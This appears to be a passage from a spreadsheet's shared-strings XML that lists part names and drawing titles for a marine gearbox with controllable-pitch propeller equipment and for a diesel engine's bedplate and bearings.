  <si>
    <t>Clutch plate - internal teeth</t>
  </si>
  <si>
    <t>Clutch plate - external teeth</t>
  </si>
  <si>
    <t>Servo piston complete</t>
  </si>
  <si>
    <t>Servo piston</t>
  </si>
  <si>
    <t>Servo piston premachined</t>
  </si>
  <si>
    <t>Servo cylinder</t>
  </si>
  <si>
    <t>Servo cylinder premachined</t>
  </si>
  <si>
    <t>Flange for servo piston</t>
  </si>
  <si>
    <t>Flange for piston premachined</t>
  </si>
  <si>
    <t>Guide pin for servo piston</t>
  </si>
  <si>
    <t>Bush for servo piston</t>
  </si>
  <si>
    <t>Servo oil pipe complete</t>
  </si>
  <si>
    <t>Servo oil pipe</t>
  </si>
  <si>
    <t>Plug for servo oil pipe</t>
  </si>
  <si>
    <t>Bush for servo oil pipe</t>
  </si>
  <si>
    <t>Magnet for sensor</t>
  </si>
  <si>
    <t>Distance ring for sensor</t>
  </si>
  <si>
    <t>Bush - Brass</t>
  </si>
  <si>
    <t>Bush - white metal</t>
  </si>
  <si>
    <t>Bush - premachined</t>
  </si>
  <si>
    <t>Mounting of axial guides</t>
  </si>
  <si>
    <t>Axial guide - fore</t>
  </si>
  <si>
    <t>Axial guide - aft</t>
  </si>
  <si>
    <t>Mounting of Throw off ring</t>
  </si>
  <si>
    <t>Throw off ring</t>
  </si>
  <si>
    <t>Shaft scraper ring</t>
  </si>
  <si>
    <t>Distance ring</t>
  </si>
  <si>
    <t>Flange for thrust shaft sealing</t>
  </si>
  <si>
    <t>Shaft brake system mounted</t>
  </si>
  <si>
    <t>Shaft brake system complete</t>
  </si>
  <si>
    <t>Shaft brake</t>
  </si>
  <si>
    <t>Brake block</t>
  </si>
  <si>
    <t>Brake disc</t>
  </si>
  <si>
    <t>Bracket for shaft brake complete</t>
  </si>
  <si>
    <t>Plate for bracket - shaft brake</t>
  </si>
  <si>
    <t>Support for bracket -shaft brake</t>
  </si>
  <si>
    <t>Distance piece for bracket</t>
  </si>
  <si>
    <t>Valve unit mounted</t>
  </si>
  <si>
    <t>Valve unit complete</t>
  </si>
  <si>
    <t>Oil block for valve unit</t>
  </si>
  <si>
    <t>Oil block - valve unit premach</t>
  </si>
  <si>
    <t>Oil block - valve unit casted</t>
  </si>
  <si>
    <t>Oil block - intermediate</t>
  </si>
  <si>
    <t>Slide for servo oil pressure</t>
  </si>
  <si>
    <t>Bush for servo oil pressure</t>
  </si>
  <si>
    <t>Slide for clutch oil pressure</t>
  </si>
  <si>
    <t>Bush for clutch oil pressure</t>
  </si>
  <si>
    <t>Valve cone for valve unit</t>
  </si>
  <si>
    <t>Spring for slide</t>
  </si>
  <si>
    <t>Spring cap</t>
  </si>
  <si>
    <t>Flange for spring cap</t>
  </si>
  <si>
    <t>Tension washer</t>
  </si>
  <si>
    <t>Safety valve unit mounted</t>
  </si>
  <si>
    <t>Safety valve unit complete</t>
  </si>
  <si>
    <t>Oil block for safety valves</t>
  </si>
  <si>
    <t>Oil block - safety valve premach</t>
  </si>
  <si>
    <t>Oil block - safety valve casted</t>
  </si>
  <si>
    <t>Proportional valve mounted</t>
  </si>
  <si>
    <t>Proportional valve - complete</t>
  </si>
  <si>
    <t>Pilot valve - complete</t>
  </si>
  <si>
    <t>Coil for pilot valve</t>
  </si>
  <si>
    <t>Connector for pilot valve</t>
  </si>
  <si>
    <t>Protection cap for pilot valve</t>
  </si>
  <si>
    <t>Filter for pilot valve</t>
  </si>
  <si>
    <t>Solenoid valve mounted</t>
  </si>
  <si>
    <t>Solenoid valve w/flow reduction</t>
  </si>
  <si>
    <t>Solenoid valve w/press.reduction</t>
  </si>
  <si>
    <t>Solenoid valve complete</t>
  </si>
  <si>
    <t>Coil for solenoid valve</t>
  </si>
  <si>
    <t>Connector for solenoid valve</t>
  </si>
  <si>
    <t>Button for solenoid valve</t>
  </si>
  <si>
    <t>Pressure reduction valve</t>
  </si>
  <si>
    <t>Pressure reduc. valve Cartridge</t>
  </si>
  <si>
    <t>Pressure reduc. valve Sandwish</t>
  </si>
  <si>
    <t>Pressure relief valve</t>
  </si>
  <si>
    <t>Pressure relief valve Cartridge</t>
  </si>
  <si>
    <t>Pressure relief valve Sandwish</t>
  </si>
  <si>
    <t>Flow reduction valve</t>
  </si>
  <si>
    <t>Flow reduction valve - Sandwish</t>
  </si>
  <si>
    <t>Check valve</t>
  </si>
  <si>
    <t>Back pressure valve mounted</t>
  </si>
  <si>
    <t>Back pressure valve complete</t>
  </si>
  <si>
    <t>Block for back pressure valve</t>
  </si>
  <si>
    <t>Slide for back pressure valve</t>
  </si>
  <si>
    <t>Prefilter</t>
  </si>
  <si>
    <t>Prefilter with flanges</t>
  </si>
  <si>
    <t>Magnetic prefilter</t>
  </si>
  <si>
    <t>Magnetic prefilter with flanges</t>
  </si>
  <si>
    <t>Air release prefilter</t>
  </si>
  <si>
    <t>Prefilter element</t>
  </si>
  <si>
    <t>Prefilter basket</t>
  </si>
  <si>
    <t>Top cover - prefilter</t>
  </si>
  <si>
    <t>Prefilter housing</t>
  </si>
  <si>
    <t>Spring - prefilter</t>
  </si>
  <si>
    <t>Guide rod - prefilter</t>
  </si>
  <si>
    <t>Magnetic rod - prefilter</t>
  </si>
  <si>
    <t>Gasket - prefilter</t>
  </si>
  <si>
    <t>Gasket packet - prefilter</t>
  </si>
  <si>
    <t>High pressure filter - mounted</t>
  </si>
  <si>
    <t>High pressure filter</t>
  </si>
  <si>
    <t>Lub oil filter - mounted</t>
  </si>
  <si>
    <t>Lub oil filter</t>
  </si>
  <si>
    <t>High filter element</t>
  </si>
  <si>
    <t>Lub oil filter element</t>
  </si>
  <si>
    <t>Lub oil filter basket</t>
  </si>
  <si>
    <t>Filter vent screw</t>
  </si>
  <si>
    <t>Gasket for vent screw</t>
  </si>
  <si>
    <t>Guide for filter basket</t>
  </si>
  <si>
    <t>Guide plate for filter</t>
  </si>
  <si>
    <t>Gasket packet - filter</t>
  </si>
  <si>
    <t>Waste oil tray - mounted</t>
  </si>
  <si>
    <t>Waste oil tray</t>
  </si>
  <si>
    <t>Plate for waste oil tray</t>
  </si>
  <si>
    <t>Bracket for filter</t>
  </si>
  <si>
    <t>Plate for bracket - filter</t>
  </si>
  <si>
    <t>Support for bracket</t>
  </si>
  <si>
    <t>Plate for support</t>
  </si>
  <si>
    <t>Oil pump mounted</t>
  </si>
  <si>
    <t>Oil pump with pinion</t>
  </si>
  <si>
    <t>Oil pump</t>
  </si>
  <si>
    <t>Sealing packet for oil pump</t>
  </si>
  <si>
    <t>Groove ball bearing for oil pump</t>
  </si>
  <si>
    <t>Spline for oil pump</t>
  </si>
  <si>
    <t>Flange for oil pump</t>
  </si>
  <si>
    <t>Adapter flange for oil pump</t>
  </si>
  <si>
    <t>Oil cooler mounted</t>
  </si>
  <si>
    <t>Oil cooler complete</t>
  </si>
  <si>
    <t>Oil cooler</t>
  </si>
  <si>
    <t>Flange for oil cooler</t>
  </si>
  <si>
    <t>Bracket for oil cooler</t>
  </si>
  <si>
    <t>Plate for bracket - oil cooler</t>
  </si>
  <si>
    <t>Cover for oil cooler</t>
  </si>
  <si>
    <t>Cover for oil cooler casted</t>
  </si>
  <si>
    <t>Oil cooler element</t>
  </si>
  <si>
    <t>Pressure plate - oil cooler</t>
  </si>
  <si>
    <t>Duct plate - oil cooler</t>
  </si>
  <si>
    <t>Gasket for duct plate</t>
  </si>
  <si>
    <t>Gasket for oil cooler</t>
  </si>
  <si>
    <t>Distance piece - oil cooler</t>
  </si>
  <si>
    <t>Guide pin - oil cooler</t>
  </si>
  <si>
    <t>Oil accumulator mounted</t>
  </si>
  <si>
    <t>Oil accumulator with press gauge</t>
  </si>
  <si>
    <t>Oil accumulator</t>
  </si>
  <si>
    <t>Adaptor for oil accumulator</t>
  </si>
  <si>
    <t>Bracket for oil accumulator</t>
  </si>
  <si>
    <t>Plate for bracket - accumulator</t>
  </si>
  <si>
    <t>Pitch control mounted</t>
  </si>
  <si>
    <t>Adjustment of cross head</t>
  </si>
  <si>
    <t>Cover for pitch control unit</t>
  </si>
  <si>
    <t>Mounting cover - pitch control</t>
  </si>
  <si>
    <t>Bracket for cross head housing</t>
  </si>
  <si>
    <t>Cross head housing</t>
  </si>
  <si>
    <t>Top cover for cross head housing</t>
  </si>
  <si>
    <t>Guard for actuator</t>
  </si>
  <si>
    <t>Rod for handle</t>
  </si>
  <si>
    <t>Bracket for handle</t>
  </si>
  <si>
    <t>Guide pin for cross head</t>
  </si>
  <si>
    <t>Arm for cross head</t>
  </si>
  <si>
    <t>Shaft for emergency running</t>
  </si>
  <si>
    <t>Washer for manoeuvre handle</t>
  </si>
  <si>
    <t>Fork for crosshead</t>
  </si>
  <si>
    <t>Connecting link for actuator</t>
  </si>
  <si>
    <t>Guide pin for actuator</t>
  </si>
  <si>
    <t>Bush for connecting link</t>
  </si>
  <si>
    <t>Cross head - pitch control</t>
  </si>
  <si>
    <t>Forked arm - pitch control</t>
  </si>
  <si>
    <t>Guide for forked arm</t>
  </si>
  <si>
    <t>Bracket for guide - forked arm</t>
  </si>
  <si>
    <t>Stud bolt - forked arm</t>
  </si>
  <si>
    <t>Housing for reversing sleeve</t>
  </si>
  <si>
    <t>Adaptor - reversing sleeve house</t>
  </si>
  <si>
    <t>Sleeve and sleeve bush complete</t>
  </si>
  <si>
    <t>Sleeve bush for reversing</t>
  </si>
  <si>
    <t>Reversing sleeve</t>
  </si>
  <si>
    <t>Locking plate for sleeve bush</t>
  </si>
  <si>
    <t>Connecting link reversing sleeve</t>
  </si>
  <si>
    <t>Guide pin for reversing sleeve</t>
  </si>
  <si>
    <t>Oil sleeve complete</t>
  </si>
  <si>
    <t>Oil sleeve</t>
  </si>
  <si>
    <t>Oil sleeve - premachined</t>
  </si>
  <si>
    <t>Cartridge for oil sleeve</t>
  </si>
  <si>
    <t>Bush for oil sleeve</t>
  </si>
  <si>
    <t>Bush for oil sleeve - blank</t>
  </si>
  <si>
    <t>Distance ring for oil sleeve</t>
  </si>
  <si>
    <t>End cover for oil sleeve</t>
  </si>
  <si>
    <t>Cover for oil sleeve</t>
  </si>
  <si>
    <t>Cover for oil sleeve - blank</t>
  </si>
  <si>
    <t>Valve housing - oil sleeve</t>
  </si>
  <si>
    <t>Nonreturn valve - complete</t>
  </si>
  <si>
    <t>Nonreturn valve</t>
  </si>
  <si>
    <t>Valve body</t>
  </si>
  <si>
    <t>Valve guide</t>
  </si>
  <si>
    <t>Valve case</t>
  </si>
  <si>
    <t>Valve piston</t>
  </si>
  <si>
    <t>Bracket for oil sleeve complete</t>
  </si>
  <si>
    <t>Bracket for oil sleeve</t>
  </si>
  <si>
    <t>Plate for bracket - oil sleeve</t>
  </si>
  <si>
    <t>Screw for bracket - oil sleeve</t>
  </si>
  <si>
    <t>Dipstick mounted</t>
  </si>
  <si>
    <t>Dipstick</t>
  </si>
  <si>
    <t>Pipe for dipstick</t>
  </si>
  <si>
    <t>Dummy plug for dipstick</t>
  </si>
  <si>
    <t>Pitch indicator mounted</t>
  </si>
  <si>
    <t>Wire wheel for potentiometer</t>
  </si>
  <si>
    <t>Bush for potentiometer</t>
  </si>
  <si>
    <t>Shaft for potentiometer</t>
  </si>
  <si>
    <t>Pitch indicator arrangement</t>
  </si>
  <si>
    <t>Wire wheel complete</t>
  </si>
  <si>
    <t>Wire wheel - pitch indicator</t>
  </si>
  <si>
    <t>Bracket for wire wheel complete</t>
  </si>
  <si>
    <t>Bracket for wire wheel</t>
  </si>
  <si>
    <t>Guide pin for wire wheel</t>
  </si>
  <si>
    <t>Wire lock</t>
  </si>
  <si>
    <t>Wire cable</t>
  </si>
  <si>
    <t>Screw for spring</t>
  </si>
  <si>
    <t>Nipple with screw</t>
  </si>
  <si>
    <t>Internal pipes mounted</t>
  </si>
  <si>
    <t>External pipe mounted</t>
  </si>
  <si>
    <t>Suction pipe mounted</t>
  </si>
  <si>
    <t>Lub oil pipe mounted</t>
  </si>
  <si>
    <t>Servo oil pipe mounted</t>
  </si>
  <si>
    <t>Clutch oil pipe mounted</t>
  </si>
  <si>
    <t>Suction pipe - gearbox/prefilter</t>
  </si>
  <si>
    <t>Suction pipe - prefilter/pump</t>
  </si>
  <si>
    <t>LO pipe - thrust bearing</t>
  </si>
  <si>
    <t>LO pipe - filter/gearbox</t>
  </si>
  <si>
    <t>LO pipe - filter/lub oil valve</t>
  </si>
  <si>
    <t>LO pipe - oil block/cooler</t>
  </si>
  <si>
    <t>LO pipe - oil block/thermostat</t>
  </si>
  <si>
    <t>LO pipe - cooler/gearbox</t>
  </si>
  <si>
    <t>LO pipe - cooler/bearing</t>
  </si>
  <si>
    <t>LO pipe - cooler/thrust bearing</t>
  </si>
  <si>
    <t>LO pipe - gearbox/bearing</t>
  </si>
  <si>
    <t>Pipe - oil block/servo slide</t>
  </si>
  <si>
    <t>Pipe - oil block/press increase</t>
  </si>
  <si>
    <t>Pipe - oil pump/oil block</t>
  </si>
  <si>
    <t>Pipe - oil pump/safety valve</t>
  </si>
  <si>
    <t>Pipe - standby pump/oil block</t>
  </si>
  <si>
    <t>Pipe - safety valve/filter</t>
  </si>
  <si>
    <t>Pipe - filter/safety valve</t>
  </si>
  <si>
    <t>Pipe - filter/oil block</t>
  </si>
  <si>
    <t>Pipe - pump/gearbox</t>
  </si>
  <si>
    <t>Clutch pipe - block/accumulator</t>
  </si>
  <si>
    <t>Clutch pipe - block/clutch in</t>
  </si>
  <si>
    <t>Clutch pipe - block/clutch out</t>
  </si>
  <si>
    <t>Clutch pipe - block/clutch</t>
  </si>
  <si>
    <t>Suction pipe - internal</t>
  </si>
  <si>
    <t>Suction pipe - external</t>
  </si>
  <si>
    <t>Suction pipe with flange</t>
  </si>
  <si>
    <t>Pipe section for suction pipe</t>
  </si>
  <si>
    <t>Flange for suction pipe</t>
  </si>
  <si>
    <t>Bracket - suction pipe</t>
  </si>
  <si>
    <t>Lub oil pipe - internal</t>
  </si>
  <si>
    <t>Lub oil pipe - external</t>
  </si>
  <si>
    <t>Lub oil pipe with flange</t>
  </si>
  <si>
    <t>Pipe section for lub oil pipe</t>
  </si>
  <si>
    <t>Flange for lub oil pipe</t>
  </si>
  <si>
    <t>Lub oil distribution pipe</t>
  </si>
  <si>
    <t>Bracket - lub oil pipe</t>
  </si>
  <si>
    <t>Spray pipe</t>
  </si>
  <si>
    <t>Servo oil pipe - internal</t>
  </si>
  <si>
    <t>Servo oil pipe - external</t>
  </si>
  <si>
    <t>Servo oil pipe with flange</t>
  </si>
  <si>
    <t>Pipe section for servo oil pipe</t>
  </si>
  <si>
    <t>Flange for servo oil pipe</t>
  </si>
  <si>
    <t>Bracket - Servo oil pipe</t>
  </si>
  <si>
    <t>Clutch oil pipe - internal</t>
  </si>
  <si>
    <t>Clutch oil pipe - external</t>
  </si>
  <si>
    <t>Clutch oil pipe with flange</t>
  </si>
  <si>
    <t>Pipe section for clutch oil pipe</t>
  </si>
  <si>
    <t>Flange for clutch oil pipe</t>
  </si>
  <si>
    <t>Bracket - clutch oil pipe</t>
  </si>
  <si>
    <t>Pipe clamp</t>
  </si>
  <si>
    <t>Pipe section</t>
  </si>
  <si>
    <t>Hydraulic hose - low pressure</t>
  </si>
  <si>
    <t>Hydraulic hose - high pressure</t>
  </si>
  <si>
    <t>Snap coupling - male</t>
  </si>
  <si>
    <t>Snap coupling - female</t>
  </si>
  <si>
    <t>Tools for gear with engine</t>
  </si>
  <si>
    <t>Tools for gear without engine</t>
  </si>
  <si>
    <t>Test servo</t>
  </si>
  <si>
    <t>Test servo - End cover</t>
  </si>
  <si>
    <t>Test servo - Servo cylinder</t>
  </si>
  <si>
    <t>Test servo - Servo piston</t>
  </si>
  <si>
    <t>Tools for mounting - servo</t>
  </si>
  <si>
    <t>Tools for mounting - clutch</t>
  </si>
  <si>
    <t>Push-up tools for conical hub</t>
  </si>
  <si>
    <t>Auxiliary tool mounted</t>
  </si>
  <si>
    <t>Auxiliary tool</t>
  </si>
  <si>
    <t>Press mandrel</t>
  </si>
  <si>
    <t>Pusher</t>
  </si>
  <si>
    <t>Push-up cylinder</t>
  </si>
  <si>
    <t>Thread adapter - Push-up tool</t>
  </si>
  <si>
    <t>King pin - Push-up tool</t>
  </si>
  <si>
    <t>Intermediate flange for tool</t>
  </si>
  <si>
    <t>Lock washer for tool</t>
  </si>
  <si>
    <t>Tools for emergency control</t>
  </si>
  <si>
    <t>Position pipe - emergency contrl</t>
  </si>
  <si>
    <t>Cover for emergency control</t>
  </si>
  <si>
    <t>Spindle for emergency control</t>
  </si>
  <si>
    <t>Distance ring - emergency contrl</t>
  </si>
  <si>
    <t>Emergency screw</t>
  </si>
  <si>
    <t>Emergency</t>
  </si>
  <si>
    <t>Transport arrangement - Gear</t>
  </si>
  <si>
    <t>Transport tools</t>
  </si>
  <si>
    <t>Wire strap - Transport of gear</t>
  </si>
  <si>
    <t>Shackle - Transport of gear</t>
  </si>
  <si>
    <t>Lifting bolt - Transport of gear</t>
  </si>
  <si>
    <t>Screw - Transport of gear</t>
  </si>
  <si>
    <t>Adapter - Transport of gear</t>
  </si>
  <si>
    <t>Bracket - Transport af gear</t>
  </si>
  <si>
    <t>Standard spare part supply</t>
  </si>
  <si>
    <t>Extended spare part supply</t>
  </si>
  <si>
    <t>Flushing procedure - Gear</t>
  </si>
  <si>
    <t>Flushing equipment - Connection</t>
  </si>
  <si>
    <t>Flushing equipment</t>
  </si>
  <si>
    <t>Hose for flushing</t>
  </si>
  <si>
    <t>Flushing filter bag</t>
  </si>
  <si>
    <t>Flushing filter basket</t>
  </si>
  <si>
    <t>Flange - Filter basket</t>
  </si>
  <si>
    <t>Bracket complete</t>
  </si>
  <si>
    <t>Bracket</t>
  </si>
  <si>
    <t>Plate for bracket</t>
  </si>
  <si>
    <t>Cross-arm</t>
  </si>
  <si>
    <t>Support</t>
  </si>
  <si>
    <t>Angle</t>
  </si>
  <si>
    <t>Distance piece</t>
  </si>
  <si>
    <t>Distance pipe</t>
  </si>
  <si>
    <t>Locking plate</t>
  </si>
  <si>
    <t>Sealing ring</t>
  </si>
  <si>
    <t>Adjusting screw</t>
  </si>
  <si>
    <t>Cap nut</t>
  </si>
  <si>
    <t>Plug</t>
  </si>
  <si>
    <t>Plug with nozzle</t>
  </si>
  <si>
    <t>Guide pin - conical</t>
  </si>
  <si>
    <t>Guide pin - cylindrical</t>
  </si>
  <si>
    <t>Stay bolt</t>
  </si>
  <si>
    <t>Tight-fitting bolt</t>
  </si>
  <si>
    <t>Angle ball joint</t>
  </si>
  <si>
    <t>Angle ball joint with nut</t>
  </si>
  <si>
    <t>Washer - hardened</t>
  </si>
  <si>
    <t>Info number required</t>
  </si>
  <si>
    <t>TEST-DRG./PART(SINGLE)...</t>
  </si>
  <si>
    <t>INTERMED.SHAFT - TESTBED</t>
  </si>
  <si>
    <t>FREQUENCY CONVERTER</t>
  </si>
  <si>
    <t>AUGSBURG DRAWING</t>
  </si>
  <si>
    <t>UNSPECIFIED DESCRIPTION</t>
  </si>
  <si>
    <t>UNSPECIFIED INFONUMBER</t>
  </si>
  <si>
    <t>EGR + HAM   TEGLHOLMEN</t>
  </si>
  <si>
    <t>STRAIN GAUGE MEASUREMENT</t>
  </si>
  <si>
    <t>ANGLE-IRON FRAME</t>
  </si>
  <si>
    <t>DAY TANK, DIFF. DRAWINGS</t>
  </si>
  <si>
    <t>CONCRETE FOUNDATION</t>
  </si>
  <si>
    <t>HEAT BALANCE COOL. WATER</t>
  </si>
  <si>
    <t>TORSIONAL VIBR.DATA SHEET</t>
  </si>
  <si>
    <t>PLANT SPECIFICATION</t>
  </si>
  <si>
    <t>DATA F. ELASTIC MOUNTING</t>
  </si>
  <si>
    <t>GENERAL ARRANGEMENT</t>
  </si>
  <si>
    <t>FLANGE LISTE</t>
  </si>
  <si>
    <t>FLEX.EXTERNAL CONNECTIONS</t>
  </si>
  <si>
    <t>PIPE ARRANGEMENT</t>
  </si>
  <si>
    <t>BUILDING DRAWING</t>
  </si>
  <si>
    <t>INSTALLATION DRAWING</t>
  </si>
  <si>
    <t>TIGHTENING INSTRUCTION</t>
  </si>
  <si>
    <t>DIAGRAM FOR SELEC. OF PLA</t>
  </si>
  <si>
    <t>SYSTEM DESCRIPTION</t>
  </si>
  <si>
    <t>SHAFT DIM. FOR ALTERNATOR</t>
  </si>
  <si>
    <t>PRODUCT MANUAL</t>
  </si>
  <si>
    <t>FLOW DIAGRAM</t>
  </si>
  <si>
    <t>POWER PLANT SPECIFICATION</t>
  </si>
  <si>
    <t>LIST OF SYMBOLS</t>
  </si>
  <si>
    <t>LIST OF CRANKSHAFTS</t>
  </si>
  <si>
    <t>COMPRESSED AIR SYSTEM</t>
  </si>
  <si>
    <t>LUB. OIL SYSTEM</t>
  </si>
  <si>
    <t>COOLING WATER SYSTEM</t>
  </si>
  <si>
    <t>COMBUSTION AIR SYSTEM</t>
  </si>
  <si>
    <t>STEAM SYSTEM</t>
  </si>
  <si>
    <t>WATER SUPPLY SYSTEM</t>
  </si>
  <si>
    <t>DIESEL OIL SUPPLY SYSTEM</t>
  </si>
  <si>
    <t>HEAVY FUEL SUPPLY SYSTEM</t>
  </si>
  <si>
    <t>SLUDGE SYSTEM</t>
  </si>
  <si>
    <t>FUEL OIL SUPPLY SYSTEM</t>
  </si>
  <si>
    <t>BUILDING LAYOUT</t>
  </si>
  <si>
    <t>BLENDING UNIT</t>
  </si>
  <si>
    <t>MOUNTING OF DIPSTICK</t>
  </si>
  <si>
    <t>KEY PLAN</t>
  </si>
  <si>
    <t>IMO IDENTIFICATION</t>
  </si>
  <si>
    <t>DRAWINGS</t>
  </si>
  <si>
    <t>SKETCHES-CALCULATIONS ETC</t>
  </si>
  <si>
    <t>BEDPLATE-FORE</t>
  </si>
  <si>
    <t>BEDPLATE-AFT</t>
  </si>
  <si>
    <t>BEDPLATE-SECTIONAL VIEW</t>
  </si>
  <si>
    <t>MAIN BEARING SUPPORT</t>
  </si>
  <si>
    <t>MAIN BEARING SUPPORT-FORE</t>
  </si>
  <si>
    <t>MAIN BEARING SUPPORT-AFT</t>
  </si>
  <si>
    <t>JOURNAL BEARING SUPPORT</t>
  </si>
  <si>
    <t>CROSS GIRDER</t>
  </si>
  <si>
    <t>LONGITUDINAL GIRDER-FORE</t>
  </si>
  <si>
    <t>LONGITUDINAL GIRDER</t>
  </si>
  <si>
    <t>LONGITUDINAL GIRDER-AFT</t>
  </si>
  <si>
    <t>CROSS GIRDER-FORE</t>
  </si>
  <si>
    <t>CROSS GIRDER-AFT</t>
  </si>
  <si>
    <t>CUT.PLAN/PL.LIST-BEDPLATE</t>
  </si>
  <si>
    <t>AXIAL VIBRATION DAMPER</t>
  </si>
  <si>
    <t>AXIAL VIBR.DAMPER,UPPER P</t>
  </si>
  <si>
    <t>AXIAL VIBR.DAMPER,LOWER P</t>
  </si>
  <si>
    <t>OIL SEAL-AXIAL VIB.DAMPER</t>
  </si>
  <si>
    <t>STUD, AXIAL VIBR. DAMPER</t>
  </si>
  <si>
    <t>RESTRICTION FOR DAMPER</t>
  </si>
  <si>
    <t>DAMPER-OIL PIPE</t>
  </si>
  <si>
    <t>PROXIMETER-ELECTRONIC</t>
  </si>
  <si>
    <t>PROXIMETER PROBE-ELECTRON</t>
  </si>
  <si>
    <t>RUN-OUT METER-ELECTRONIC</t>
  </si>
  <si>
    <t>PROXIMETER 8 MM</t>
  </si>
  <si>
    <t>OIL PAN</t>
  </si>
  <si>
    <t>END CHOCK</t>
  </si>
  <si>
    <t>SUPPORT LUG</t>
  </si>
  <si>
    <t>TOP FLANGE</t>
  </si>
  <si>
    <t>FOOT FLANGE</t>
  </si>
  <si>
    <t>WEB PLATE</t>
  </si>
  <si>
    <t>ASSEMBLING FLANGE</t>
  </si>
  <si>
    <t>END WALL</t>
  </si>
  <si>
    <t>LIFTING BRACKET</t>
  </si>
  <si>
    <t>PACKING</t>
  </si>
  <si>
    <t>CLEARANCE, MAIN BEARING</t>
  </si>
  <si>
    <t>MAIN BEARING</t>
  </si>
  <si>
    <t>BLANK FOR BEARING SHELL</t>
  </si>
  <si>
    <t>MAIN BEARING UPPER SHELL</t>
  </si>
  <si>
    <t>MAIN BEARING LOWER SHELL</t>
  </si>
  <si>
    <t>GUIDE BEARING SHELL-UPPER</t>
  </si>
  <si>
    <t>GUIDE BEARING SHELL-LOWER</t>
  </si>
  <si>
    <t>WHITE MET.MAIN BRG.UPPER</t>
  </si>
  <si>
    <t>WHITE MET.MAIN BRG.LOWER</t>
  </si>
  <si>
    <t>WHITE MET.GUIDE BRG.UPPER</t>
  </si>
  <si>
    <t>WHITE MET.GUIDE BRG.LOWER</t>
  </si>
  <si>
    <t>MAIN BEARING CAP</t>
  </si>
  <si>
    <t>LUBRICATING PIPE</t>
  </si>
  <si>
    <t>MAIN BEARING STUD</t>
  </si>
  <si>
    <t>MAIN BEARING NUT</t>
  </si>
  <si>
    <t>EXPERIMENT</t>
  </si>
  <si>
    <t>JOURNAL BEARING</t>
  </si>
  <si>
    <t>JOURN.BEARING UPPER SHELL</t>
  </si>
  <si>
    <t>JOURN.BEARING LOWER SHELL</t>
  </si>
  <si>
    <t>WHITE MET.JOURN.BRG.UPPER</t>
  </si>
  <si>
    <t>WHITE MET.JOURN.BRG.LOWER</t>
  </si>
  <si>
    <t>JOURNAL BEARING CAP</t>
  </si>
  <si>
    <t>JOURNAL BEARING STUD</t>
  </si>
  <si>
    <t>OIL PAN-SECTIONAL VIEW</t>
  </si>
  <si>
    <t>GRATE</t>
  </si>
  <si>
    <t>EXPANSION ELEMENT</t>
  </si>
  <si>
    <t>DIPSTICK</t>
  </si>
  <si>
    <t>SUCTION PIPE</t>
  </si>
  <si>
    <t>DRIVER-Y56F</t>
  </si>
  <si>
    <t>PUMP STATION</t>
  </si>
  <si>
    <t>DETAIL FOR OIL PAN</t>
  </si>
  <si>
    <t>MAIN BEARING SCREW</t>
  </si>
  <si>
    <t>WELDING-ON NUT</t>
  </si>
  <si>
    <t>PERFORATED PLATE</t>
  </si>
  <si>
    <t>ROUND STEEL</t>
  </si>
  <si>
    <t>GEAR HOUSING</t>
  </si>
  <si>
    <t>ARCH RIB U. AFT. SHIELD</t>
  </si>
  <si>
    <t>BOTTOM FLANGE</t>
  </si>
  <si>
    <t>BATTEN PLATE BY FLYWHEEL</t>
  </si>
  <si>
    <t>ASSEMBLY PLATE</t>
  </si>
  <si>
    <t>BRACKET, LUB. OIL COOLER</t>
  </si>
  <si>
    <t>SIDE PLATE U. ENGINE</t>
  </si>
  <si>
    <t>BOTTOM PLATE U. ENGINE</t>
  </si>
  <si>
    <t>TOP FLANGE UNDER ENGINE</t>
  </si>
  <si>
    <t>CAP NUT</t>
  </si>
  <si>
    <t>PIPE FOR LEVEL ALARM</t>
  </si>
  <si>
    <t>PLATE FOR FRONT SHIELD</t>
  </si>
  <si>
    <t>RIB. U. ENGINE</t>
  </si>
  <si>
    <t>BAFFLE PLATE</t>
  </si>
  <si>
    <t>RECTANGULAR HOLLOW SEC.</t>
  </si>
  <si>
    <t>SIDE PLATE U. FLYWHEEL</t>
  </si>
  <si>
    <t>1. ARCH RIB U. FLYWHEEL</t>
  </si>
  <si>
    <t>BRACKET FOR LUB. FILTER</t>
  </si>
  <si>
    <t>2. ARCH RIB U. FLYWHEEL</t>
  </si>
  <si>
    <t>BEDPLATE WELDED</t>
  </si>
  <si>
    <t>PLATES UNDER GENERATOR</t>
  </si>
  <si>
    <t>PIPE BOTTOM</t>
  </si>
  <si>
    <t>SUCTION PIPE F. SEPARATOR</t>
  </si>
  <si>
    <t>PLATE FOR AFT. SHIELD</t>
  </si>
  <si>
    <t>PLATE FOR CONICAL</t>
  </si>
  <si>
    <t>CONICAL - ANTIVIBRA.MOUNT</t>
  </si>
  <si>
    <t>MOUNT.OF FOUNDATION BOLTS</t>
  </si>
  <si>
    <t>ADHESIVE RESILIENT PAD</t>
  </si>
  <si>
    <t>BULB FLATS</t>
  </si>
  <si>
    <t>OIL LEVEL</t>
  </si>
  <si>
    <t>GEN. REQUIREM. BASE FRAME</t>
  </si>
  <si>
    <t>ADHESIVE PASTE</t>
  </si>
  <si>
    <t>TOLERANCES FOR FOUNDATION</t>
  </si>
  <si>
    <t>FOLLOW-UP SCHEDULE</t>
  </si>
  <si>
    <t>GUIDE TOOLS</t>
  </si>
  <si>
    <t>STUD F. PULLEY F. MAIN.B.</t>
  </si>
  <si>
    <t>LIFT. TOOL, MAIN BRG.CAP</t>
  </si>
  <si>
    <t>SUPPORT F HYDRAULIC TOOL</t>
  </si>
  <si>
    <t>CLAMP FOR WIRE</t>
  </si>
  <si>
    <t>RETAIN.TOOL-M.BRG.SHELL</t>
  </si>
  <si>
    <t>DISM. TOOL,MAIN BRG SHELL</t>
  </si>
  <si>
    <t>LIFT-TOOL-JOURNAL BRG.CAP</t>
  </si>
  <si>
    <t>BRIDGE GAUGE,MAIN BEARING</t>
  </si>
  <si>
    <t>TIGHTN.TEMPLATE A.V.D.</t>
  </si>
  <si>
    <t>BORING TOOL</t>
  </si>
  <si>
    <t>SPINDLE FOR DRILLING MACH</t>
  </si>
  <si>
    <t>WOODEN BOX</t>
  </si>
  <si>
    <t>HOUSING UPPER</t>
  </si>
  <si>
    <t>HOUSING LOWER</t>
  </si>
  <si>
    <t>BASEPLATE</t>
  </si>
  <si>
    <t>WHITEMETAL IN GUIDE BRG</t>
  </si>
  <si>
    <t>INSTRUCTION DRAWINGS</t>
  </si>
  <si>
    <t>HEATING COIL</t>
  </si>
  <si>
    <t>FIXEERING</t>
  </si>
  <si>
    <t>TEMPLATE TO MAGNET FILTER</t>
  </si>
  <si>
    <t>ARR. OF MAGNETIC FILTER</t>
  </si>
  <si>
    <t>SOUNDING SCHEDULE</t>
